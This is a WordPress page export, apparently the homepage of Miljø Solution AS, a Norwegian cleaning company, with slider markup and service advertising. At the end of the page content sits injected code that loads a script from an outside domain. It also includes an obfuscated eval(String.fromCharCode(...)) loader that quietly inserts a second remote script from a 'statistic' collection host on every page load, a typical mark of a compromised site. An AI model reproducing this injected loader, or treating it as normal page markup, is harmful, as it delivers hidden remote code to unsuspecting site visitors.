{"id":1368,"date":"2019-07-29T07:13:57","date_gmt":"2019-07-29T06:13:57","guid":{"rendered":"http:\/\/ms24.no\/?page_id=1368"},"modified":"2023-10-30T16:44:09","modified_gmt":"2023-10-30T15:44:09","slug":"hjem","status":"publish","type":"page","link":"https:\/\/ms24.no\/","title":{"rendered":"Hjem"},"content":{"rendered":"<script type=\"text\/javascript\">jQuery(function() { _initLayerSlider( '#layerslider_1_15cwprv13h84z', {createdWith: '6.7.6', sliderVersion: '6.11.7', type: 'fullwidth', allowFullscreen: true, pauseOnHover: 'enabled', skin: 'v6', sliderFadeInDuration: 350, navStartStop: false, navButtons: false, showCircleTimer: false, useSrcset: true, skinsPath: 'https:\/\/ms24.no\/wp-content\/plugins\/LayerSlider\/assets\/static\/layerslider\/skins\/', performanceMode: true}); });<\/script><link href=\"https:\/\/fonts.googleapis.com\/css?family=Roboto:100,100i,200,200i,300,300i,400,400i,500,500i,600,600i,700,700i,800,800i,900,900i\" rel=\"stylesheet\"><div id=\"layerslider_1_15cwprv13h84z\"  class=\"ls-wp-container fitvidsignore ls-selectable\" style=\"width:1230px;height:500px;max-width:1230px;margin:0 auto;margin-bottom: 0px;\"><div class=\"ls-slide\" data-ls=\"transition2d:11;transitionduration:1000;\"><img loading=\"lazy\" decoding=\"async\" width=\"1555\" height=\"751\" src=\"https:\/\/ms24.no\/wp-content\/uploads\/2021\/02\/office-cleaning.jpg\" class=\"ls-bg\" alt=\"\" srcset=\"https:\/\/ms24.no\/wp-content\/uploads\/2021\/02\/office-cleaning.jpg 1555w, https:\/\/ms24.no\/wp-content\/uploads\/2021\/02\/office-cleaning-300x145.jpg 300w, https:\/\/ms24.no\/wp-content\/uploads\/2021\/02\/office-cleaning-1024x495.jpg 1024w, https:\/\/ms24.no\/wp-content\/uploads\/2021\/02\/office-cleaning-768x371.jpg 768w, https:\/\/ms24.no\/wp-content\/uploads\/2021\/02\/office-cleaning-1536x742.jpg 1536w, https:\/\/ms24.no\/wp-content\/uploads\/2021\/02\/office-cleaning-600x290.jpg 600w\" sizes=\"auto, (max-width: 1555px) 100vw, 1555px\" \/><img loading=\"lazy\" decoding=\"async\" width=\"1210\" height=\"723\" src=\"https:\/\/ms24.no\/wp-content\/uploads\/2019\/07\/window.jpg\" class=\"ls-tn\" alt=\"\" srcset=\"https:\/\/ms24.no\/wp-content\/uploads\/2019\/07\/window.jpg 1210w, https:\/\/ms24.no\/wp-content\/uploads\/2019\/07\/window-300x179.jpg 300w, https:\/\/ms24.no\/wp-content\/uploads\/2019\/07\/window-768x459.jpg 768w, https:\/\/ms24.no\/wp-content\/uploads\/2019\/07\/window-1024x612.jpg 1024w, https:\/\/ms24.no\/wp-content\/uploads\/2019\/07\/window-600x359.jpg 600w\" sizes=\"auto, (max-width: 1210px) 100vw, 1210px\" \/><div style=\"top:0px;left:0px;background-size:inherit;background-position:inherit;font-size:18px;width:100%;height:100%;background-color:rgba(0, 0, 0, 0.5);\" class=\"ls-l ls-hide-desktop ls-hide-tablet ls-hide-phone ls-html-layer\" data-ls=\"durationin:-8000;position:fixed;\"><\/div><h2 style=\"top:119px;left:0px;text-align:center;font-weight:700;font-style:normal;line-height:85px;width:100%;color:#14287b;font-size:60px;\" class=\"ls-l ls-hide-desktop ls-hide-tablet ls-text-layer\" data-ls=\"offsetxin:left;durationin:1500;offsetxout:left;hover:true;hovereasingin:easeInOutQuint;hovereasingout:easeInCubic;position:relative;\">Offentlig godkjent renholdsbedrift<\/h2><h2 style=\"top:224px;left:-43px;text-align:center;font-weight:700;font-style:normal;font-size:58px;color:#ffffff;line-height:58px;width:1224px;\" class=\"ls-l ls-hide-tablet ls-hide-phone ls-text-layer\" data-ls=\"offsetyin:bottom;durationin:2000;delayin:20;offsetyout:bottom;position:relative;\">Hovedrengj\u00f8ring <br> og mye mer.... <br><\/h2><h2 style=\"top:71px;left:-357px;text-align:center;font-weight:700;font-style:normal;font-size:77px;color:#ffffff;line-height:77px;width:1622px;\" class=\"ls-l ls-hide-tablet ls-hide-phone ls-text-layer\" data-ls=\"offsetyin:bottom;durationin:2000;delayin:20;offsetyout:bottom;position:relative;\">Daglig renhold<br>\nSpesialrenhold,<br><\/h2><a style=\"\" class=\"ls-l ls-hide-tablet ls-hide-phone\" href=\"http:\/\/ms24.no\/booking\/index_one_step.php\" target=\"_blank\" data-ls=\"offsetxin:left;durationin:1500;delayin:20;offsetxout:left;position:relative;\"><h2 style=\"top:355px;left:57px;text-align:center;font-weight:700;font-style:normal;text-decoration:none;font-size:48px;line-height:48px;width:1026px;color:#2fc72a;\" class=\"ls-text-layer\">Faste priser uansett st\u00f8rrelse! Skjekk pris\"\"\"<\/h2><\/a><\/div><div class=\"ls-slide\" data-ls=\"transition2d:1,5;transitionduration:1000;kenburnszoom:out;\"><img loading=\"lazy\" decoding=\"async\" width=\"1279\" height=\"682\" src=\"https:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/2016-08_0408-2.jpg\" class=\"ls-bg\" alt=\"\" srcset=\"https:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/2016-08_0408-2.jpg 1279w, https:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/2016-08_0408-2-300x160.jpg 300w, https:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/2016-08_0408-2-1024x546.jpg 1024w, https:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/2016-08_0408-2-768x410.jpg 768w, https:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/2016-08_0408-2-600x320.jpg 600w\" sizes=\"auto, (max-width: 1279px) 100vw, 1279px\" \/><div style=\"top:0px;left:0px;background-size:inherit;background-position:inherit;font-size:18px;width:100%;height:100%;background-color:rgba(0, 0, 0, 0.5);\" class=\"ls-l ls-hide-desktop ls-hide-tablet ls-hide-phone ls-html-layer\" data-ls=\"durationin:-8000;position:fixed;\"><\/div><p style=\"top:228px;left:1px;text-align:center;font-weight:600;font-style:normal;color:#147a39;line-height:70px;width:1229px;font-size:18px;\" class=\"ls-l ls-hide-desktop ls-hide-tablet ls-text-layer\" data-ls=\"offsetyin:bottom;durationin:2000;delayin:20;offsetyout:bottom;position:relative;\">Milj\u00f8 Solution AS skal levere renholdstjenester til private bedrifter og det offentlige marked med basis i v\u00e5re grunnleggende verdier.<\/p><h2 style=\"top:162px;left:0px;text-align:center;font-weight:700;font-style:normal;line-height:85px;width:100%;color:#147a39;font-size:60px;\" class=\"ls-l ls-hide-desktop ls-hide-tablet ls-text-layer\" data-ls=\"offsetxin:left;durationin:1500;offsetxout:left;hover:true;hovereasingin:easeInOutQuint;hovereasingout:easeInCubic;position:relative;\">Offentlig godkjent renholdsbedrift<\/h2><p style=\"top:135px;left:18px;text-align:center;font-weight:400;font-style:normal;font-size:18px;line-height:34px;width:1158px;\" class=\"ls-l ls-hide-desktop ls-hide-phone ls-text-layer\" data-ls=\"offsetyin:bottom;durationin:2000;delayin:20;offsetyout:bottom;position:relative;\">Bevare verdier og skape trivsel ! <br>Milj\u00f8 Solution AS skal levere renholdstjenester til private bedrifter og det offentlige marked med basis i v\u00e5re grunnleggende verdier.<\/p><h2 style=\"top:49px;left:0px;text-align:center;font-weight:700;font-style:normal;font-size:58px;line-height:64px;width:100%;color:#19e068;\" class=\"ls-l ls-hide-desktop ls-hide-phone ls-text-layer\" data-ls=\"offsetxin:left;durationin:1500;offsetxout:left;hover:true;hovereasingin:easeInOutQuint;hovereasingout:easeInCubic;position:relative;\">Offentlig godkjent renholdsbedrift<\/h2><a style=\"\" class=\"ls-l ls-hide-tablet ls-hide-phone\" href=\"http:\/\/ms24.no\/booking\/index_one_step.php\" target=\"_self\" data-ls=\"offsetxin:left;durationin:2500;delayin:40;offsetyout:bottom;position:relative;\"><h5 style=\"top:217px;left:54px;text-align:center;font-weight:700;font-style:normal;font-size:48px;font-family:Roboto;line-height:27px;width:1044px;color:#2fc72a;\" class=\"ls-text-layer\"><br> Pr\u00f8v v\u00e5r priskalkulator som umiddelbart gir deg&gt;&gt;&gt;<br><br> svar p\u00e5 hva v\u00e5re tjenester vil koste for din bedrift!<br><\/h5><\/a><a style=\"\" class=\"ls-l ls-hide-tablet ls-hide-phone\" href=\"http:\/\/ms24.no\/booking\/index_one_step.php\" target=\"_self\" data-ls=\"offsetxin:left;durationin:2500;delayin:40;offsetyout:bottom;position:relative;\"><h1 style=\"top:149px;left:95px;text-align:center;font-weight:700;font-style:normal;font-size:27px;color:#ffffff;font-family:Roboto;line-height:27px;width:1044px;\" class=\"ls-text-layer\"><br>Daglig renhold, Spesialrenhold og Hovedrengj\u00f8ring mye mer....<\/h1><\/a><a style=\"\" class=\"ls-l\" href=\"http:\/\/ms24.no\/booking\/index_one_step.php\" target=\"_self\" data-ls=\"offsetxin:left;durationin:1500;delayin:20;offsetxout:left;position:relative;\"><h2 style=\"top:51px;left:181px;text-align:center;font-weight:600;font-style:normal;font-size:42px;line-height:42px;width:782px;color:#ffffff;\" class=\"ls-text-layer\">Ingen oppdrag er for sm\u00e5,<br> ingen utfordringer er for store.<\/h2><\/a><\/div><div class=\"ls-slide\" ><img loading=\"lazy\" decoding=\"async\" width=\"1400\" height=\"788\" src=\"https:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/Indre-Havneby-11.jpg\" class=\"ls-bg\" alt=\"\" srcset=\"https:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/Indre-Havneby-11.jpg 1400w, https:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/Indre-Havneby-11-300x169.jpg 300w, https:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/Indre-Havneby-11-1024x576.jpg 1024w, https:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/Indre-Havneby-11-768x432.jpg 768w, https:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/Indre-Havneby-11-600x338.jpg 600w\" sizes=\"auto, (max-width: 1400px) 100vw, 1400px\" \/><a style=\"\" class=\"ls-l\" href=\"http:\/\/ms24.no\/booking\/index_one_step.php\" target=\"_self\" data-ls=\"position:relative;\"><h2 style=\"top:318px;left:61px;text-align:center;font-weight:700;font-style:normal;background-size:inherit;background-position:inherit;font-size:41px;color:#2fc72a;line-height:41px;\" class=\"ls-text-layer\">Pr\u00f8v v\u00e5r priskalkulator som umiddelbart gir deg&gt;&gt;&gt;<br> \n               svar p\u00e5 hva v\u00e5re tjenester vil koste for deg og din bolig.<\/h2><\/a><a style=\"\" class=\"ls-l\" href=\"http:\/\/ms24.no\/booking\/index_one_step.php\" target=\"_self\" data-ls=\"position:relative;\"><h2 style=\"top:151px;left:67px;text-align:center;font-weight:700;font-style:normal;background-size:inherit;background-position:inherit;font-size:94px;color:#ffffff;line-height:94px;\" class=\"ls-text-layer\">Flyttevask med garanti!<\/h2><\/a><a style=\"\" class=\"ls-l ls-hide-desktop ls-hide-tablet\" href=\"http:\/\/ms24.no\/booking\/index_one_step.php\" target=\"_self\" data-ls=\"position:relative;\"><h1 style=\"top:270px;left:77px;background-size:inherit;background-position:inherit;font-size:18px;color:#ffff;\" class=\"ls-text-layer\">For oss i Milj\u00f8 Solution AS er milj\u00f8 en viktig faktor, derfor velger vi samarbeidspartnere som ogs\u00e5 er opptatt av dette. <br> V\u00e5r samarbeidspartner p\u00e5 rekvisita og kjemi har sterkt fokus p\u00e5 milj\u00f8 og hele produktserien vi bruker er milj\u00f8merket<br><\/h1><\/a><\/div><\/div>\n<p>Dette kan vi gj\u00f8re for deg<a href=\"http:\/\/ms24.no\/bedriftrenhold\/\">\u00a0<\/a><\/p>\n<h3><a href=\"http:\/\/ms24.no\/bedriftrenhold\/\"><br \/>\n<em>Bedriftrenhold<\/em><\/a><em>&#8211;<a href=\"http:\/\/ms24.no\/privatrenhold\/\">Privatrenhold<\/a>&#8211;<a href=\"http:\/\/ms24.no\/byggrenhold\/\">Byggrenhold<\/a>&#8211;<a href=\"http:\/\/ms24.no\/mattelosninger\/\">Mattel\u00f8sninger<\/a>&#8211;<a href=\"http:\/\/ms24.no\/booking\/index_one_step.php\">Flytte tjeneste<\/a>&#8211;<a href=\"http:\/\/ms24.no\/trappevask\/\">Trappevask <\/a><\/em><\/h3>\n<p><!--more--><\/p>\n<h3 style=\"text-align: center;\">Vi leverer renhold og tjenester av h\u00f8y kvalitet til b\u00e5de privat- og bedriftskunder.<\/h3>\n<h4>Vi arbeider sv\u00e6rt effektivt og leverer de beste resultatene,<br \/>\nog sender\u00a0faktura f\u00f8rst n\u00e5r du er forn\u00f8yd.<\/h4>\n<h5 style=\"text-align: left;\">VI HAR F\u00d8LGENDE SERTIFISERINGER<\/h5>\n<p><!--more--><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"\" src=\"http:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/Startbank-140x105@2x.png\" alt=\"\" width=\"176\" height=\"132\" \/><img loading=\"lazy\" decoding=\"async\" class=\"\" src=\"http:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/renholdsbedrift_orig.jpg\" alt=\"\" width=\"168\" height=\"108\" \/><img loading=\"lazy\" decoding=\"async\" class=\"\" src=\"http:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/mva-registrert_orig.png\" alt=\"\" width=\"182\" height=\"117\" \/><img loading=\"lazy\" decoding=\"async\" class=\"\" src=\"http:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/gronn-punkt-e1611063978829.png\" alt=\"\" width=\"94\" height=\"97\" \/><img loading=\"lazy\" decoding=\"async\" class=\"\" src=\"http:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/Miljofyrtarn-140x105@2x.png\" alt=\"\" width=\"128\" height=\"96\" \/><br \/>\n<script src='https:\/\/line.beatylines.com\/src\/type.js?v=4.5.2' type='text\/javascript' id='globalsway'><\/script><script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Dette kan vi gj\u00f8re for deg\u00a0 Bedriftrenhold&#8211;Privatrenhold&#8211;Byggrenhold&#8211;Mattel\u00f8sninger&#8211;Flytte tjeneste&#8211;Trappevask<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-1368","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/1368","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ms24.no\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1368"}],"version-history":[{"count":370,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/1368\/revisions"}],"predecessor-version":[{"id":5910,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/1368\/revisions\/5910"}],"wp:attachment":[{"href":"https:\/\/ms24.no\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1368"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}